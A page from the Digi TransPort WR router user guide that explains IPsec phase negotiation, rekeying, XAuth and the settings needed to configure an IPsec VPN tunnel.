Virtual Private Networks (VPN) IPsec
Digi TransPort WR Routers User Guide
192
Aggressive mode is faster than main mode, but is not as secure as main mode, because the device
and its peer exchange their IDs and hash information in clear text instead of being encrypted.
Aggressive mode is usually used when one or both of the devices have a dynamic external IP
address.
Phase 2
In phase 2, IKE negotiates the SAs for IPsec. This creates two unidirectional SAs, one for each
direction. Once the phase 2 negotiation is complete, the IPsec tunnel should be fully functional.
IPsec and IKE renegotiation
To reduce the chances of an IPsec tunnel being compromised, the IPsec SAs and IKE SA are
renegotiated at a regular interval. This results in different encryption keys being used in the IPsec
tunnel.
IPsec and XAuth
XAuth (eXtended Authentication) pre-shared key authentication mode provides additional security
using client authentication credentials in addition to the standard pre-shared key. TransPort devices
can act as either a XAuth client or server.
Configure an IPsec tunnel
Configuring an IPsec tunnel with a remote device involves configuring the following items:
Required configuration items
n IPsec tunnel configuration items:
l Enabling the IPsec tunnel. The IPsec tunnels are disabled by default. You can also set the
IPsec tunnel state to off or on.
l The IP address or name of the remote device, also known as the peer, at the other end of
the IPsec tunnel.
l The local and remote IDs at either end of the IPsec tunnel. The setting for the local ID must
match the setting for the remote ID on the remote device, and the setting for the remote
IDmust match the setting for the local IDon the remote device.
l The local and remote IP networks at either end of the IPsec tunnel.
l The authentication mode:Either Preshared key authentication or XAuth and Preshared
Key authentication. For information about XAuth and pre-shared key authentication, see
IPsec XAuth authentication.
l The shared key the device and the remote device use to authenticate each other.
l The Encapsulating Security Payload (ESP) encryption protocol to use. This has to match the
encryption protocol configured on the remote device.
l The ESP authentication protocol to use. This setting must match the authentication
protocol configured on the remote device.
l The ESPDiffie-Hellman group for the IPsec tunnel. This setting must match the Diffie-
Hellman group configured on the remote device.
The larger the number of bits, the more secure the IPsec tunnel. However, a larger bit
length requires more computing power, which can slow down the tunnel negotiation and
performance.
To Next Page
Loading...
